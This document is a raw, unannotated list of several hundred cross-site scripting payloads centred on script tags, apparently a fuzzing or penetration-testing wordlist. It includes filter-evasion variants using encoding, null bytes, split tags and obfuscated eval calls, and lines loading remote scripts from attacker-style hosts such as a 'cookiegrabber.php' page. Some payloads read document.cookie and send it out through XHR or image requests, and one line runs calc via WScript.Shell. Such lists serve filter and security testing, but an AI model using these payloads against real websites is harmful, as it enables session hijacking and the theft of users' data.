- <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7"></SCRIPT>
- <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJKTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0EJCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0UJKSAJKCAJKSAJICA7"></SCRIPT>
- <script src=”data:text/javascript,confirm(1)”></script>
- “/><script src=”data:text/javascript,confirm(1)”></script>
- <script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
- ><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
- “<script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”
- “\”><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”,
- <script src=”data:text/plain\x2Cjavascript:alert(1)”></script>
- <script/src=data:text/javascript,alert(4)></script>
- <script src=data:,\u006fnerror=\u0061lert(1)></script>
- <script src=data:,\u006fnerror=\u0061lert;throw[document.domain]></script>
- <script src=”data:\xCB\x8F,javascript:alert(1)”></script>
- <script src=”data:\xD4\x8F,javascript:alert(1)”></script>
- <script src=”data:\xE0\xA4\x98,javascript:alert(1)”></script>
- <script src=//domain%26sol;my.js%26num;
- <script src=”//domain%26sol;my.js%26num;
- <script src=//DOMAIN/></script>
- “><script src=”file:///c:/wonderful.js”></script><”
- ‘> →<script/src=//go.bmoine.fr/xss>
- <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>”
- <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
- <;SCRIPT SRC=//ha.ckers.org/.j>;
- <SCRIPT SRC=//ha.ckers.org/.j>
- <script src=//HOST/SCRIPT></script>
- <SCRIPT =”>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;
- <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
- <;SCRIPT SRC=”;http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
- <SCRIPT SRC=”http://ha.ckers.org/xss.jpg"></SCRIPT>
- <;SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
- <SCRIPT =”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT+SRC=http://host/
- <script src=”/?http://html5sec.org/test.js “></script>
- <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT>
- <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser
- <script src=http://renwa.tk/d.js></script>
- <script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
- //|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
- <script src=https://www.google.com/complete/search?client=chrome
- <script src=’https://www.n00py.io/evil.js'></script>
- “<script src=’https://www.n00py.io/evil.js'></script>"
- <script src=”http://www.evilsite.org/cookiegrabber.php"></script>
- <script SRC=”http://www.securitycompass.com/xss.jpg"></script>
- <script =”>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script> src=”http://www.site.com/XSS.js"></script>
- ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
- ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
- <SCRIPT SRC=”http://xss.cx/xss.jpg"></SCRIPT>
- <SCRIPT SRC=http://xss.cx/xss.js?<B>
- //|\\ <script //|\\ src=’http://xss.cx/xss.js'> //|\\ </script //|\\
- <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
- <SCRIPT =”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT =”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT src=”http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
- <script src=http://xssor.io/xss.js></SCRIPT>
- <SCRIPT SRC=http://xss.rocks/xss.js?< B >
- <script src=http://yoursite.com/your_files.js></script>
- <script src=”//INPUT”></script>
- <script src=”INPUT”></script
- <script src=”javascript:alert(1)”>
- <script src=javascript:alert(1)>
- <script src=javascript:alert(1)>
- <script src=javascript:alert(160)>
- <script src=”javascript:alert(3)”></script> // IE6, O11.01, OM10.1
- <SCRIPT SRC=”%(jpg)s”></SCRIPT>
- <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
- <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(17)’)()}}
- <SCRIPT SRC=%(jscript)s?<B>
- <script src=”/\%(jscript)s”></script>
- <script src=”\\%(jscript)s”></script>
- <script src=%(jscript)s></script>
- <SCRIPT/SRC=”%(jscript)s”></SCRIPT>
- <script src=//l0.cm>//20
- <SCRIPT SRC_NeatHtmlReplace=”//ha.ckers.org/.j”>
- <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.jpg"></SCRIPT>
- <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script+src=”>”+src=”http://yoursite.com/xss.js?69,69"></script>
- <script src=/upload/…></script>
- <script src=”URL”></script>
- <script src=URL></script>
- <script/src=//xss.cx>/*
- <script src=/xss.js></script><base href=//evil/
- <script>’str1ng’.replace(/1/,alert)</script>
- <script>str=’’;for(i=0;i<0xefff;i++){str+=’<script>AAAAAA’;};document.write(‘<svg>’+str+’</svg>’);</script>
- <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
- <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59)</script>
- <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
- </script><svg ‘//”
- “></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
- </script><svg onload=alert(1)>
- </script><svg onload=alert(184)>
- </script><svg onload=’-/”/-confirm(1)//’”
- </script><svg onload=’-/”/-confirm(1)//’
- →’”/></sCript><svG x=”>” onload=(co\u006efirm)``>
- /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i,
- /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i;
- “/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i”
- ( /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i)
- <script/	 src=’https://dl.dropbox.com/u/13018058/js.js' /	></script>
- <script>this[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
- <script>this[490837..toString(1<<5)](/*code to eval()*/)</script>
- <script>this[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
- <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
- <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
- <script>this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
- <script>throw~delete~typeof~prompt(1)</script>
- <script>throw new class extends Function{}(‘alert(1)’)``</script>
- →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
- →</script></title></style>”/</textarea><a’ onclick=alert()//>*/alert()/*
- >]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img -
- <script>top[‘alert’](3)</script>
- <script>try{eval(“<></>”);logBoolean(1)}catch(e){logBoolean(0)};</script>
- <script type=”text/javascript”></script>
- <script type=text/javascript></script>
- <script type=text/vbscript>msgbox document.location</script>
- <script type=text/vbscript>msgbox document.location</script> // IE 10
- <script type=”text/xaml”><Canvas Loaded=”confirm” /></script>
- <script type=vbscript>MsgBox(0)</script>
- <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
- <script>\u0061\u006C\u0065\u0072\u0074`1`</script>
- <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
- <script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 Variation
- <script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
- <script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script>
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
- <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script>
- <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script> // ES6 Variation
- ?scriptualert(EXSSE)?/scriptu
- <script> “\ud83d\u*hex4*”.match(/.*<.*/) ? log(*num*) : null; </script>
- <script>-{valueOf:location,toString:[].pop,0:’vbscript:alert%281%29',length:1}</script>
- <script>-{valueOf:location,toString:[].pop,0:’vbscript:confirm%281%29',length:1}</script>
- <script>var%20c=1337";alert(c)</script>
- <script>var%20x%20=%20a?aa?;%20confirm(1);//a?;</script>
- <script>var a = “</script> <script> alert(‘XSS !’); </script> <script>”;</script>
- <script>var fn=window[490837..toString(1<<5)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[490837..toString(1<<5)];fn(/*code to eval()/*);</script>
- <script>var fn=window[atob(‘ZXZhbA==’)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[atob(‘ZXZhbA==’)];fn(/*code to eval()/*);</script>
- <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(/*code to eval()/*);</script>
- <script> vari=location.hash; document.write(i); </script>
- <script>var junk = ‘</script><script>alert(1)</script>’;</script>
- <script>var location={};</script>
- <script>var m=<html><a href=”//host”>link</a>
- <script>var m=<html><a href=//site>link</a>
- <script>var m=<html><a href=//site>link</a></html></script> // XML inside JS
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script>var name=”"-alert``//”</script>
- <script>var q=””;alert(1)//”</script>
- <script>var q=””;location=’javascript\x3Aalert\x281\x29'//”</script>
- <script>var q=””;location=’javascript\x3Aalert\x2822\x29'//”</script>
- <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
- <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
- <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <script>var var = 1; alert(var)</script>
- <script>var var = 1; alert(var)</script>
- <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
- <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
- “/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
- <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
- <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
- <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
- <script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
- <script> Var x=vInputv; </script>
- <script/v>confirm(/@jackmasa/)</script>
- <script>void(‘&b=’);alert(1);</script>
- <script>window[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
- <script>window[490837..toString(1<<5)](/*code to eval()*/)</script>
- <script>window[‘alert’](0)</script>
- <script>window[‘alert’](document[‘domain’])<script>
- <script>window.alert(‘XSS Vulnerable’);</script>
- /><script>window.alert(‘XSS Vulnerable’);</script>
- <script>window[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
- <script>window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- ←’<script>window.confirm(1)</script> — !>
- `’”><script>window[‘log*chr*’](*num*)</script>
- ‘<script>window.onload=function(){document.forms[0].message.value=’1';}</script>
- <script>window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
- <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
- <script>write(a?<img/src=//xss.cx/?a?+cookie.replace(/\s/g,””)+a?>a?)></script>
- <script\x00>alert(1)</script>
- <script>/* *\x00/javascript:alert(1)// */</script>
- <script\x00>javascript:alert(1)</script>
- “`’><script>\x00javascript:alert(1)</script>
- <script\x09>javascript:alert(1)</script>
- “`’><script>\x09javascript:alert(1)</script>
- <script\x09type=”text/javascript”>javascript:alert(1);</script>
- <script\x0A>javascript:alert(1)</script>
- “`’><script>\x0Ajavascript:alert(1)</script>
- <script\x0Atype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x0Bjavascript:alert(1)</script>
- <script\x0C>javascript:alert(1)</script>
- “`’><script>\x0Cjavascript:alert(1)</script>
- <script\x0Ctype=”text/javascript”>javascript:alert(1);</script>
- <script\x0D>javascript:alert(1)</script>
- “`’><script>\x0Djavascript:alert(1)</script>
- <script\x0Dtype=”text/javascript”>javascript:alert(1);</script>
- <script\x20>javascript:alert(1)</script>
- “`’><script>\x20javascript:alert(1)</script>
- <script\x20type=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x21javascript:alert(1)</script>
- <script>/* *\x2A/javascript:alert(1)// */</script>
- “`’><script>\x2Bjavascript:alert(1)</script>
- <script\x2F>javascript:alert(1)</script>
- ‘“`><script>/* *\x2Fjavascript:alert(1)// */</script>
- <script\x2Ftype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x3Bjavascript:alert(1)</script>
- <script\x3Etype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x7Ejavascript:alert(1)</script>
- <script/x>alert(1)</script>
- <script x> alert(1) </script 1=2
- <script>!{x(){alert(1)}}.x()</script>
- <script x> alert</script 1=2
- <script x>alert(‘XSS’)<script y>
- “><script x=#”async=#”src=”//a?a?L
- “`’><script>\xC2\x85javascript:alert(1)</script>
- “`’><script>\xC2\xA0javascript:alert(1)</script>
- <script>x=”confirm(1)”.replace(/.+/,eval)//”</script>
- <script x> confirm(1) </script 1=2
- “/><script x> confirm(1) </script 1=2
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
- “`’><script>\xE1\x9A\x80javascript:alert(1)</script>
- “`’><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
- “`’><script>\xE2\x80\x80javascript:alert(1)</script>
- “`’><script>\xE2\x80\x81javascript:alert(1)</script>
- “`’><script>\xE2\x80\x82javascript:alert(1)</script>
- “`’><script>\xE2\x80\x83javascript:alert(1)</script>
- “`’><script>\xE2\x80\x84javascript:alert(1)</script>
- “`’><script>\xE2\x80\x85javascript:alert(1)</script>
- “`’><script>\xE2\x80\x86javascript:alert(1)</script>
- “`’><script>\xE2\x80\x87javascript:alert(1)</script>
- “`’><script>\xE2\x80\x88javascript:alert(1)</script>
- “`’><script>\xE2\x80\x89javascript:alert(1)</script>
- “`’><script>\xE2\x80\x8Ajavascript:alert(1)</script>
- “`’><script>\xE2\x80\x8Bjavascript:alert(1)</script>
- “`’><script>\xE2\x80\xA8javascript:alert(1)</script>
- “`’><script>\xE2\x80\xA9javascript:alert(1)</script>
- “`’><script>\xE2\x80\xAFjavascript:alert(1)</script>
- “`’><script>\xE2\x81\x9Fjavascript:alert(1)</script>
- “`’><script>\xE3\x80\x80javascript:alert(1)</script>
- “`’><script>\xEF\xBB\xBFjavascript:alert(1)</script>
- “`’><script>\xEF\xBF\xAEjavascript:alert(1)</script>
- “`’><script>\xEF\xBF\xBEjavascript:alert(1)</script>
- “`’><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
- <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
- <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
- <script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
- <script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
- <_:script xmlns:_=”hxxp://www.w3.org/1999/xhtml">alert(65)</_:script>
- <script>x=new ActiveXObject(“WScript.Shell”);x.run(‘calc’);</script>
- <script>x=new class extends Function{}(‘alert(1)’); x=new x;</script>
- </script><x ng-app ng-csp>{{constructor.constructor(‘alert(1)’)()}}
- <script>x=””^prompt(9)^””;y=42;</script>
- <script>x=””<<prompt(9)<<””;y=42;</script>
- <script>x=””<=prompt(9)<=””;y=42;</script>
- <script>x=””<prompt(9)<””;y=42;</script>
- <script>x=””===prompt(9)===””;y=42;</script>
- <script>x=””==prompt(9)==””;y=42;</script>
- <script>x=””>=prompt(9)>=””;y=42;</script>
- <script>x=””>>>prompt(9)>>>””;y=42;</script>
- <script>x=””>>prompt(9)>>””;y=42;</script>
- <script>x=””>prompt(9)>””;y=42;</script>
- <script>x=””||prompt(9)||””;y=42;</script>
- <script>x=””|prompt(9)|””;y=42;</script>
- <script>x=””-prompt(9)-””;y=42;</script>
- <script>x=””!=prompt(9)!=””;y=42;</script>
- <script>x=””?prompt(9):””;y=42;</script>
- <script>x=””/prompt(9)/””;y=42;</script>
- <script>x=””*prompt(9)*””;y=42;</script>
- <script>x=””&&prompt(9)&&””;y=42;</script>
- <script>x=””&prompt(9)&””;y=42;</script>
- <script>x=””%prompt(9)%””;y=42;</script>
- <script>x=””+prompt(9)+””;y=42;</script>
- <script>x=’<%’</script> %>/alert(2)</script>
- <ScRIPT x src=//0x.lv?
- <SCRIPT/XSS id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"></SCRIPT>
- <;SCRIPT/XSS SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT/XSSSRC=”http://host"></SCRIPT>
- <SCRIPT/XSS SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT/XSS SRC=”http://xss.rocks/xss.js"></SCRIPT>
- <script>z=’document.’</script>
- <script>z=document.</script>
- <script>z=+write(“</script>
- <script>z=z+’js></sc’</script>
- <script>z=z+’.net/1.’</script>
- <script>z=z+’ript>”)’</script>
- <script>z=z+<script</script>
- <script>z=z+’<script’</script>
- <script>z=z+’ src=ht’</script>
- <script>z=z+’tp://ww’</script>
- <script>z=z+’write(“‘</script>
- <script>z=z+’w.shell’</script>
- “><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
- <scri\x00pt>alert(1);</scri%00pt>
- <Scri \ x00pt> alert (1); </ scri% 00pt>
- <scri\x00pt>confirm(1);</scri%00pt>
- </Scrpt/”%27 — !>%20<Scrpt>%20confirm(1)%20</Scrpt>
- <SCR?PT>alert(181)</SCR?PT>
- <SCR?PT>alert(41)</SCR?PT>
- <SCR?PT/SRC=data:,alert(182)>
- <SCR?PT/SRC=data:,alert(42)>
- <scr<script>ipt>alert(0x000123)</script>
- \”><scr<script>ipt>alert(0x000123)</script>
- <scr<script>ipt>alert(0x000123)</scr</script>ipt>
- \”<scr<script>ipt>alert(0x000123)</scr</script>ipt>
- <;scrscriptipt>;alert(1)<;/scrscriptipt>;
